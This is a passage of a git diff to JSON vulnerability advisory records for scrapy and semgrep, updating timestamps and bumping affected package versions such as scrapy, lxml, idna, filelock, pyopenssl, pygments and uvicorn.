"pkg:pypi/scrapy@2.18.0" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "scrapy", - "subject_version": "2.17.0", - "key": "pkg:pypi/scrapy@2.17.0" + "subject_version": "2.18.0", + "key": "pkg:pypi/scrapy@2.18.0" }, { "strategy": "distro", @@ -78,15 +78,15 @@ "strategy": "distro", "ecosystem": "GIT", "name": "https://github.com/scrapy/scrapy", - "subject_version": "2.17.0", + "subject_version": "2.18.0", "key": "upstream:https://github.com/scrapy/scrapy" }, { "strategy": "distro", "ecosystem": "PyPI", "name": "scrapy", - "subject_version": "2.17.0", - "key": "upstream:pkg:pypi/scrapy@2.17.0" + "subject_version": "2.18.0", + "key": "upstream:pkg:pypi/scrapy@2.18.0" }, { "strategy": "distro", diff --git a/advisories/BREW-scrapy-CVE-2022-2309.json b/advisories/BREW-scrapy-CVE-2022-2309.json index 0c756703325..4ac4aa86539 100644 --- a/advisories/BREW-scrapy-CVE-2022-2309.json +++ b/advisories/BREW-scrapy-CVE-2022-2309.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-scrapy-CVE-2022-2309", "published": "2026-08-13T17:34:19Z", - "modified": "2026-08-13T17:34:19Z", + "modified": "2026-08-22T09:33:04Z", "upstream": [ "GHSA-wrxv-2j5q-m38w", "CVE-2022-2309", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "4.9.1", "resource": "lxml", - "resource_purl": "pkg:pypi/lxml@6.1.1" + "resource_purl": "pkg:pypi/lxml@6.1.2" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", + "subject_version": "6.1.2", + "key": "pkg:pypi/lxml@6.1.2", "resource": "lxml" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", + "subject_version": "6.1.2", + "key": "pkg:pypi/lxml@6.1.2", "resource": "lxml" } ] diff --git a/advisories/BREW-scrapy-CVE-2024-1892.json b/advisories/BREW-scrapy-CVE-2024-1892.json index 5275bbbe270..d1c6317831a 100644 --- a/advisories/BREW-scrapy-CVE-2024-1892.json +++ b/advisories/BREW-scrapy-CVE-2024-1892.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-scrapy-CVE-2024-1892", "published": "2026-08-13T17:34:19Z", - "modified": "2026-08-13T17:34:19Z", + "modified": "2026-08-22T09:33:04Z", "upstream": [ "CVE-2024-1892", "GHSA-cc65-xxvf-f7r9", @@ -44,29 +44,29 @@ "strategy": "git", "ecosystem": "GIT", "name": "https://github.com/scrapy/scrapy", - "subject_version": "2.17.0", + "subject_version": "2.18.0", "key": "https://github.com/scrapy/scrapy" }, { "strategy": "git", "ecosystem": "GIT", "name": "https://github.com/scrapy/scrapy", - "subject_version": "2.17.0", + "subject_version": "2.18.0", "key": "https://github.com/scrapy/scrapy" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "scrapy", - "subject_version": "2.17.0", - "key": "pkg:pypi/scrapy@2.17.0" + "subject_version": "2.18.0", + "key": "pkg:pypi/scrapy@2.18.0" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "scrapy", - "subject_version": "2.17.0", - "key": "pkg:pypi/scrapy@2.17.0" + "subject_version": "2.18.0", + "key": "pkg:pypi/scrapy@2.18.0" }, { "strategy": "distro", @@ -78,15 +78,15 @@ "strategy": "distro", "ecosystem": "GIT", "name": "https://github.com/scrapy/scrapy", - "subject_version": "2.17.0", + "subject_version": "2.18.0", "key": "upstream:https://github.com/scrapy/scrapy" }, { "strategy": "distro", "ecosystem": "PyPI", "name": "scrapy", - "subject_version": "2.17.0", - "key": "upstream:pkg:pypi/scrapy@2.17.0" + "subject_version": "2.18.0", + "key": "upstream:pkg:pypi/scrapy@2.18.0" }, { "strategy": "distro", diff --git a/advisories/BREW-scrapy-CVE-2024-1968.json b/advisories/BREW-scrapy-CVE-2024-1968.json index 8a6cc04be82..ace4e28829d 100644 --- a/advisories/BREW-scrapy-CVE-2024-1968.json +++ b/advisories/BREW-scrapy-CVE-2024-1968.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-scrapy-CVE-2024-1968", "published": "2026-08-13T17:34:19Z", - "modified": "2026-08-13T17:34:19Z", + "modified": "2026-08-22T09:33:04Z", "upstream": [ "CVE-2024-1968", "GHSA-4qqq-9vqf-3h3f", @@ -44,29 +44,29 @@ "strategy": "git", "ecosystem": "GIT", "name": "https://github.com/scrapy/scrapy", - "subject_version": "2.17.0", + "subject_version": "2.18.0", "key": "https://github.com/scrapy/scrapy" }, { "strategy": "git", "ecosystem": "GIT", "name": "https://github.com/scrapy/scrapy", - "subject_version": "2.17.0", + "subject_version": "2.18.0", "key": "https://github.com/scrapy/scrapy" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "scrapy", - "subject_version": "2.17.0", - "key": "pkg:pypi/scrapy@2.17.0" + "subject_version": "2.18.0", + "key": "pkg:pypi/scrapy@2.18.0" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "scrapy", - "subject_version": "2.17.0", - "key": "pkg:pypi/scrapy@2.17.0" + "subject_version": "2.18.0", + "key": "pkg:pypi/scrapy@2.18.0" }, { "strategy": "distro", @@ -78,15 +78,15 @@ "strategy": "distro", "ecosystem": "GIT", "name": "https://github.com/scrapy/scrapy", - "subject_version": "2.17.0", + "subject_version": "2.18.0", "key": "upstream:https://github.com/scrapy/scrapy" }, { "strategy": "distro", "ecosystem": "PyPI", "name": "scrapy", - "subject_version": "2.17.0", - "key": "upstream:pkg:pypi/scrapy@2.17.0" + "subject_version": "2.18.0", + "key": "upstream:pkg:pypi/scrapy@2.18.0" }, { "strategy": "distro", diff --git a/advisories/BREW-scrapy-CVE-2024-3572.json b/advisories/BREW-scrapy-CVE-2024-3572.json index 6a9baba8949..297eda3307b 100644 --- a/advisories/BREW-scrapy-CVE-2024-3572.json +++ b/advisories/BREW-scrapy-CVE-2024-3572.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-scrapy-CVE-2024-3572", "published": "2026-08-13T17:34:19Z", - "modified": "2026-08-13T17:34:19Z", + "modified": "2026-08-22T09:33:04Z", "upstream": [ "CVE-2024-3572", "GHSA-7j7m-v7m3-jqm7", @@ -44,22 +44,22 @@ "strategy": "git", "ecosystem": "GIT", "name": "https://github.com/scrapy/scrapy", - "subject_version": "2.17.0", + "subject_version": "2.18.0", "key": "https://github.com/scrapy/scrapy" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "scrapy", - "subject_version": "2.17.0", - "key": "pkg:pypi/scrapy@2.17.0" + "subject_version": "2.18.0", + "key": "pkg:pypi/scrapy@2.18.0" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "scrapy", - "subject_version": "2.17.0", - "key": "pkg:pypi/scrapy@2.17.0" + "subject_version": "2.18.0", + "key": "pkg:pypi/scrapy@2.18.0" }, { "strategy": "distro", @@ -71,15 +71,15 @@ "strategy": "distro", "ecosystem": "GIT", "name": "https://github.com/scrapy/scrapy", - "subject_version": "2.17.0", + "subject_version": "2.18.0", "key": "upstream:https://github.com/scrapy/scrapy" }, { "strategy": "distro", "ecosystem": "PyPI", "name": "scrapy", - "subject_version": "2.17.0", - "key": "upstream:pkg:pypi/scrapy@2.17.0" + "subject_version": "2.18.0", + "key": "upstream:pkg:pypi/scrapy@2.18.0" }, { "strategy": "distro", diff --git a/advisories/BREW-scrapy-CVE-2024-3574.json b/advisories/BREW-scrapy-CVE-2024-3574.json index c863f3be0f5..3fadbcf0dca 100644 --- a/advisories/BREW-scrapy-CVE-2024-3574.json +++ b/advisories/BREW-scrapy-CVE-2024-3574.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-scrapy-CVE-2024-3574", "published": "2026-08-13T17:34:19Z", - "modified": "2026-08-13T17:34:19Z", + "modified": "2026-08-22T09:33:04Z", "upstream": [ "CVE-2024-3574", "GHSA-cw9j-q3vf-hrrv", @@ -44,22 +44,22 @@ "strategy": "git", "ecosystem": "GIT", "name": "https://github.com/scrapy/scrapy", - "subject_version": "2.17.0", + "subject_version": "2.18.0", "key": "https://github.com/scrapy/scrapy" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "scrapy", - "subject_version": "2.17.0", - "key": "pkg:pypi/scrapy@2.17.0" + "subject_version": "2.18.0", + "key": "pkg:pypi/scrapy@2.18.0" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "scrapy", - "subject_version": "2.17.0", - "key": "pkg:pypi/scrapy@2.17.0" + "subject_version": "2.18.0", + "key": "pkg:pypi/scrapy@2.18.0" }, { "strategy": "distro", @@ -71,15 +71,15 @@ "strategy": "distro", "ecosystem": "GIT", "name": "https://github.com/scrapy/scrapy", - "subject_version": "2.17.0", + "subject_version": "2.18.0", "key": "upstream:https://github.com/scrapy/scrapy" }, { "strategy": "distro", "ecosystem": "PyPI", "name": "scrapy", - "subject_version": "2.17.0", - "key": "upstream:pkg:pypi/scrapy@2.17.0" + "subject_version": "2.18.0", + "key": "upstream:pkg:pypi/scrapy@2.18.0" }, { "strategy": "distro", diff --git a/advisories/BREW-scrapy-CVE-2024-3651.json b/advisories/BREW-scrapy-CVE-2024-3651.json index cb35109cb28..a6398e23843 100644 --- a/advisories/BREW-scrapy-CVE-2024-3651.json +++ b/advisories/BREW-scrapy-CVE-2024-3651.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-scrapy-CVE-2024-3651", "published": "2026-08-13T17:34:19Z", - "modified": "2026-08-13T17:34:19Z", + "modified": "2026-08-22T09:33:04Z", "upstream": [ "GHSA-jjg7-2v4v-x38h", "CVE-2024-3651", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.7", "resource": "idna", - "resource_purl": "pkg:pypi/idna@3.18" + "resource_purl": "pkg:pypi/idna@3.19" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", + "subject_version": "3.19", + "key": "pkg:pypi/idna@3.19", "resource": "idna" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", + "subject_version": "3.19", + "key": "pkg:pypi/idna@3.19", "resource": "idna" } ] diff --git a/advisories/BREW-scrapy-CVE-2025-6176.json b/advisories/BREW-scrapy-CVE-2025-6176.json index c7d3ed24053..26793f7a24a 100644 --- a/advisories/BREW-scrapy-CVE-2025-6176.json +++ b/advisories/BREW-scrapy-CVE-2025-6176.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-scrapy-CVE-2025-6176", "published": "2026-08-13T17:34:19Z", - "modified": "2026-08-13T17:34:19Z", + "modified": "2026-08-22T09:33:04Z", "upstream": [ "GHSA-2qfp-q593-8484", "CVE-2025-6176", @@ -45,15 +45,31 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "scrapy", - "subject_version": "2.17.0", - "key": "pkg:pypi/scrapy@2.17.0" + "subject_version": "2.18.0", + "key": "pkg:pypi/scrapy@2.18.0" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "brotli", + "subject_version": "1.2.0", + "key": "pkg:pypi/brotli@1.2.0", + "resource": "brotli" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "scrapy", - "subject_version": "2.17.0", - "key": "pkg:pypi/scrapy@2.17.0" + "subject_version": "2.18.0", + "key": "pkg:pypi/scrapy@2.18.0" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "brotli", + "subject_version": "1.2.0", + "key": "pkg:pypi/brotli@1.2.0", + "resource": "brotli" } ] }, diff --git a/advisories/BREW-scrapy-CVE-2025-68146.json b/advisories/BREW-scrapy-CVE-2025-68146.json index ed884c11dbb..95834126052 100644 --- a/advisories/BREW-scrapy-CVE-2025-68146.json +++ b/advisories/BREW-scrapy-CVE-2025-68146.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-scrapy-CVE-2025-68146", "published": "2026-08-13T17:34:19Z", - "modified": "2026-08-13T17:34:19Z", + "modified": "2026-08-22T09:33:04Z", "upstream": [ "GHSA-w853-jp5j-5j7f", "CVE-2025-68146", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.20.1", "resource": "filelock", - "resource_purl": "pkg:pypi/filelock@3.29.6" + "resource_purl": "pkg:pypi/filelock@3.32.3" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "filelock", - "subject_version": "3.29.6", - "key": "pkg:pypi/filelock@3.29.6", + "subject_version": "3.32.3", + "key": "pkg:pypi/filelock@3.32.3", "resource": "filelock" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "filelock", - "subject_version": "3.29.6", - "key": "pkg:pypi/filelock@3.29.6", + "subject_version": "3.32.3", + "key": "pkg:pypi/filelock@3.32.3", "resource": "filelock" } ] diff --git a/advisories/BREW-scrapy-CVE-2026-22701.json b/advisories/BREW-scrapy-CVE-2026-22701.json index e99029914eb..e9b2869742e 100644 --- a/advisories/BREW-scrapy-CVE-2026-22701.json +++ b/advisories/BREW-scrapy-CVE-2026-22701.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-scrapy-CVE-2026-22701", "published": "2026-08-13T17:34:19Z", - "modified": "2026-08-13T17:34:19Z", + "modified": "2026-08-22T09:33:04Z", "upstream": [ "GHSA-qmgc-5h2g-mvrw", "CVE-2026-22701", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.20.3", "resource": "filelock", - "resource_purl": "pkg:pypi/filelock@3.29.6" + "resource_purl": "pkg:pypi/filelock@3.32.3" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "filelock", - "subject_version": "3.29.6", - "key": "pkg:pypi/filelock@3.29.6", + "subject_version": "3.32.3", + "key": "pkg:pypi/filelock@3.32.3", "resource": "filelock" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "filelock", - "subject_version": "3.29.6", - "key": "pkg:pypi/filelock@3.29.6", + "subject_version": "3.32.3", + "key": "pkg:pypi/filelock@3.32.3", "resource": "filelock" } ] diff --git a/advisories/BREW-scrapy-CVE-2026-27448.json b/advisories/BREW-scrapy-CVE-2026-27448.json index 5c70b2bbac6..107628d8f26 100644 --- a/advisories/BREW-scrapy-CVE-2026-27448.json +++ b/advisories/BREW-scrapy-CVE-2026-27448.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-scrapy-CVE-2026-27448", "published": "2026-08-13T17:34:19Z", - "modified": "2026-08-13T17:34:19Z", + "modified": "2026-08-22T09:33:04Z", "upstream": [ "GHSA-vp96-hxj8-p424", "CVE-2026-27448", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "26.0.0", "resource": "pyopenssl", - "resource_purl": "pkg:pypi/pyopenssl@26.3.0" + "resource_purl": "pkg:pypi/pyopenssl@26.4.0" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "pyopenssl", - "subject_version": "26.3.0", - "key": "pkg:pypi/pyopenssl@26.3.0", + "subject_version": "26.4.0", + "key": "pkg:pypi/pyopenssl@26.4.0", "resource": "pyopenssl" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "pyopenssl", - "subject_version": "26.3.0", - "key": "pkg:pypi/pyopenssl@26.3.0", + "subject_version": "26.4.0", + "key": "pkg:pypi/pyopenssl@26.4.0", "resource": "pyopenssl" } ] diff --git a/advisories/BREW-scrapy-CVE-2026-27459.json b/advisories/BREW-scrapy-CVE-2026-27459.json index 710fceeadeb..d8400f48274 100644 --- a/advisories/BREW-scrapy-CVE-2026-27459.json +++ b/advisories/BREW-scrapy-CVE-2026-27459.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-scrapy-CVE-2026-27459", "published": "2026-08-13T17:34:19Z", - "modified": "2026-08-13T17:34:19Z", + "modified": "2026-08-22T09:33:04Z", "upstream": [ "GHSA-5pwr-322w-8jr4", "CVE-2026-27459", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "26.0.0", "resource": "pyopenssl", - "resource_purl": "pkg:pypi/pyopenssl@26.3.0" + "resource_purl": "pkg:pypi/pyopenssl@26.4.0" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "pyopenssl", - "subject_version": "26.3.0", - "key": "pkg:pypi/pyopenssl@26.3.0", + "subject_version": "26.4.0", + "key": "pkg:pypi/pyopenssl@26.4.0", "resource": "pyopenssl" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "pyopenssl", - "subject_version": "26.3.0", - "key": "pkg:pypi/pyopenssl@26.3.0", + "subject_version": "26.4.0", + "key": "pkg:pypi/pyopenssl@26.4.0", "resource": "pyopenssl" } ] diff --git a/advisories/BREW-scrapy-CVE-2026-41066.json b/advisories/BREW-scrapy-CVE-2026-41066.json index 6500688a379..7e1c35b53e4 100644 --- a/advisories/BREW-scrapy-CVE-2026-41066.json +++ b/advisories/BREW-scrapy-CVE-2026-41066.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-scrapy-CVE-2026-41066", "published": "2026-08-13T17:34:19Z", - "modified": "2026-08-13T17:34:19Z", + "modified": "2026-08-22T09:33:04Z", "upstream": [ "GHSA-vfmq-68hx-4jfw", "CVE-2026-41066", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "6.1.0", "resource": "lxml", - "resource_purl": "pkg:pypi/lxml@6.1.1" + "resource_purl": "pkg:pypi/lxml@6.1.2" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", + "subject_version": "6.1.2", + "key": "pkg:pypi/lxml@6.1.2", "resource": "lxml" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", + "subject_version": "6.1.2", + "key": "pkg:pypi/lxml@6.1.2", "resource": "lxml" } ] diff --git a/advisories/BREW-scrapy-CVE-2026-45409.json b/advisories/BREW-scrapy-CVE-2026-45409.json index 31b1dd0d5fc..cc57da02f7e 100644 --- a/advisories/BREW-scrapy-CVE-2026-45409.json +++ b/advisories/BREW-scrapy-CVE-2026-45409.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-scrapy-CVE-2026-45409", "published": "2026-08-13T17:34:19Z", - "modified": "2026-08-13T17:34:19Z", + "modified": "2026-08-22T09:33:04Z", "upstream": [ "GHSA-65pc-fj4g-8rjx", "CVE-2026-45409", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.15", "resource": "idna", - "resource_purl": "pkg:pypi/idna@3.18" + "resource_purl": "pkg:pypi/idna@3.19" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", + "subject_version": "3.19", + "key": "pkg:pypi/idna@3.19", "resource": "idna" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", + "subject_version": "3.19", + "key": "pkg:pypi/idna@3.19", "resource": "idna" } ] diff --git a/advisories/BREW-scrapy-GHSA-23j4-mw76-5v7h.json b/advisories/BREW-scrapy-GHSA-23j4-mw76-5v7h.json index c4e85140aec..14d846b2747 100644 --- a/advisories/BREW-scrapy-GHSA-23j4-mw76-5v7h.json +++ b/advisories/BREW-scrapy-GHSA-23j4-mw76-5v7h.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-scrapy-GHSA-23j4-mw76-5v7h", "published": "2026-08-13T17:34:19Z", - "modified": "2026-08-13T17:34:19Z", + "modified": "2026-08-22T09:33:04Z", "upstream": [ "GHSA-23j4-mw76-5v7h" ], @@ -42,8 +42,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "scrapy", - "subject_version": "2.17.0", - "key": "pkg:pypi/scrapy@2.17.0" + "subject_version": "2.18.0", + "key": "pkg:pypi/scrapy@2.18.0" } ] }, diff --git a/advisories/BREW-scrapy-GHSA-9x8m-2xpf-crp3.json b/advisories/BREW-scrapy-GHSA-9x8m-2xpf-crp3.json index f55bdca61bd..95802949b78 100644 --- a/advisories/BREW-scrapy-GHSA-9x8m-2xpf-crp3.json +++ b/advisories/BREW-scrapy-GHSA-9x8m-2xpf-crp3.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-scrapy-GHSA-9x8m-2xpf-crp3", "published": "2026-08-13T17:34:19Z", - "modified": "2026-08-13T17:34:19Z", + "modified": "2026-08-22T09:33:04Z", "upstream": [ "GHSA-9x8m-2xpf-crp3" ], @@ -42,8 +42,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "scrapy", - "subject_version": "2.17.0", - "key": "pkg:pypi/scrapy@2.17.0" + "subject_version": "2.18.0", + "key": "pkg:pypi/scrapy@2.18.0" } ] }, diff --git a/advisories/BREW-scrapy-GHSA-cwxj-rr6w-m6w7.json b/advisories/BREW-scrapy-GHSA-cwxj-rr6w-m6w7.json index 4223485e3cb..992373b5e05 100644 --- a/advisories/BREW-scrapy-GHSA-cwxj-rr6w-m6w7.json +++ b/advisories/BREW-scrapy-GHSA-cwxj-rr6w-m6w7.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-scrapy-GHSA-cwxj-rr6w-m6w7", "published": "2026-08-13T17:34:19Z", - "modified": "2026-08-13T17:34:19Z", + "modified": "2026-08-22T09:33:04Z", "upstream": [ "GHSA-cwxj-rr6w-m6w7" ], @@ -42,8 +42,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "scrapy", - "subject_version": "2.17.0", - "key": "pkg:pypi/scrapy@2.17.0" + "subject_version": "2.18.0", + "key": "pkg:pypi/scrapy@2.18.0" } ] }, diff --git a/advisories/BREW-scrapy-GHSA-jm3v-qxmh-hxwv.json b/advisories/BREW-scrapy-GHSA-jm3v-qxmh-hxwv.json index 88d281444cd..b3babb64b93 100644 --- a/advisories/BREW-scrapy-GHSA-jm3v-qxmh-hxwv.json +++ b/advisories/BREW-scrapy-GHSA-jm3v-qxmh-hxwv.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-scrapy-GHSA-jm3v-qxmh-hxwv", "published": "2026-08-13T17:34:19Z", - "modified": "2026-08-13T17:34:19Z", + "modified": "2026-08-22T09:33:04Z", "upstream": [ "GHSA-jm3v-qxmh-hxwv" ], @@ -42,8 +42,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "scrapy", - "subject_version": "2.17.0", - "key": "pkg:pypi/scrapy@2.17.0" + "subject_version": "2.18.0", + "key": "pkg:pypi/scrapy@2.18.0" } ] }, diff --git a/advisories/BREW-scrapy-GHSA-mfjm-vh54-3f96.json b/advisories/BREW-scrapy-GHSA-mfjm-vh54-3f96.json index 7041a6596b1..3d4ac446391 100644 --- a/advisories/BREW-scrapy-GHSA-mfjm-vh54-3f96.json +++ b/advisories/BREW-scrapy-GHSA-mfjm-vh54-3f96.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-scrapy-GHSA-mfjm-vh54-3f96", "published": "2026-08-13T17:34:19Z", - "modified": "2026-08-13T17:34:19Z", + "modified": "2026-08-22T09:33:04Z", "upstream": [ "GHSA-mfjm-vh54-3f96" ], @@ -42,8 +42,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "scrapy", - "subject_version": "2.17.0", - "key": "pkg:pypi/scrapy@2.17.0" + "subject_version": "2.18.0", + "key": "pkg:pypi/scrapy@2.18.0" } ] }, diff --git a/advisories/BREW-semgrep-CVE-2015-8557.json b/advisories/BREW-semgrep-CVE-2015-8557.json index 5038803a370..221e3310c91 100644 --- a/advisories/BREW-semgrep-CVE-2015-8557.json +++ b/advisories/BREW-semgrep-CVE-2015-8557.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-semgrep-CVE-2015-8557", "published": "2026-08-13T17:34:27Z", - "modified": "2026-08-13T17:34:27Z", + "modified": "2026-08-22T09:33:18Z", "upstream": [ "GHSA-fff8-4w9p-7v76", "CVE-2015-8557", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "2.1", "resource": "pygments", - "resource_purl": "pkg:pypi/pygments@2.20.0" + "resource_purl": "pkg:pypi/pygments@2.21.0" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" } ] diff --git a/advisories/BREW-semgrep-CVE-2020-7694.json b/advisories/BREW-semgrep-CVE-2020-7694.json index 5292d531ee4..9f3ac92d5ce 100644 --- a/advisories/BREW-semgrep-CVE-2020-7694.json +++ b/advisories/BREW-semgrep-CVE-2020-7694.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-semgrep-CVE-2020-7694", "published": "2026-08-13T17:34:27Z", - "modified": "2026-08-17T17:50:16Z", + "modified": "2026-08-22T09:33:18Z", "upstream": [ "GHSA-33c7-2mpw-hg34", "CVE-2020-7694", @@ -34,7 +34,7 @@ "range_state": "fixed", "upstream_fixed_in": "0.11.7", "resource": "uvicorn", - "resource_purl": "pkg:pypi/uvicorn@0.52.3" + "resource_purl": "pkg:pypi/uvicorn@0.52.4" } } ], @@ -47,16 +47,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "uvicorn", - "subject_version": "0.52.3", - "key": "pkg:pypi/uvicorn@0.52.3", + "subject_version": "0.52.4", + "key": "pkg:pypi/uvicorn@0.52.4", "resource": "uvicorn" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "uvicorn", - "subject_version": "0.52.3", - "key": "pkg:pypi/uvicorn@0.52.3", + "subject_version": "0.52.4", + "key": "pkg:pypi/uvicorn@0.52.4", "resource": "uvicorn" } ] diff --git a/advisories/BREW-semgrep-CVE-2020-7695.json b/advisories/BREW-semgrep-CVE-2020-7695.json index 67cf8dced54..e90d1c33c5c 100644 --- a/advisories/BREW-semgrep-CVE-2020-7695.json +++ b/advisories/BREW-semgrep-CVE-2020-7695.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-semgrep-CVE-2020-7695", "published": "2026-08-13T17:34:27Z", - "modified": "2026-08-17T17:50:16Z", + "modified": "2026-08-22T09:33:18Z", "upstream": [ "GHSA-f97h-2pfx-f59f", "CVE-2020-7695", @@ -34,7 +34,7 @@ "range_state": "fixed", "upstream_fixed_in": "0.11.7", "resource": "uvicorn", - "resource_purl": "pkg:pypi/uvicorn@0.52.3" + "resource_purl": "pkg:pypi/uvicorn@0.52.4" } } ], @@ -47,16 +47,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "uvicorn", - "subject_version": "0.52.3", - "key": "pkg:pypi/uvicorn@0.52.3", + "subject_version": "0.52.4", + "key": "pkg:pypi/uvicorn@0.52.4", "resource": "uvicorn" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "uvicorn", - "subject_version": "0.52.3", - "key": "pkg:pypi/uvicorn@0.52.3", + "subject_version": "0.52.4", + "key": "pkg:pypi/uvicorn@0.52.4", "resource": "uvicorn" } ] diff --git a/advisories/BREW-semgrep-CVE-2021-20270.json b/advisories/BREW-semgrep-CVE-2021-20270.json index c70452bada1..5cee2f01ca9 100644 --- a/advisories/BREW-semgrep-CVE-2021-20270.json +++ b/advisories/BREW-semgrep-CVE-2021-20270.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-semgrep-CVE-2021-20270", "published": "2026-08-13T17:34:27Z", - "modified": "2026-08-13T17:34:27Z", + "modified": "2026-08-22T09:33:18Z", "upstream": [ "GHSA-9w8r-397f-prfh", "CVE-2021-20270", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "2.7.4", "resource": "pygments", - "resource_purl": "pkg:pypi/pygments@2.20.0" + "resource_purl": "pkg:pypi/pygments@2.21.0" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" } ] diff --git a/advisories/BREW-semgrep-CVE-2021-27291.json b/advisories/BREW-semgrep-CVE-2021-27291.json index a8e183bc844..587ddc07d0b 100644 --- a/advisories/BREW-semgrep-CVE-2021-27291.json +++ b/advisories/BREW-semgrep-CVE-2021-27291.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-semgrep-CVE-2021-27291", "published": "2026-08-13T17:34:27Z", - "modified": "2026-08-13T17:34:27Z", + "modified": "2026-08-22T09:33:18Z", "upstream": [ "GHSA-pq64-v7f5-gqh8", "CVE-2021-27291", @@ -33,7 +33,7 @@ 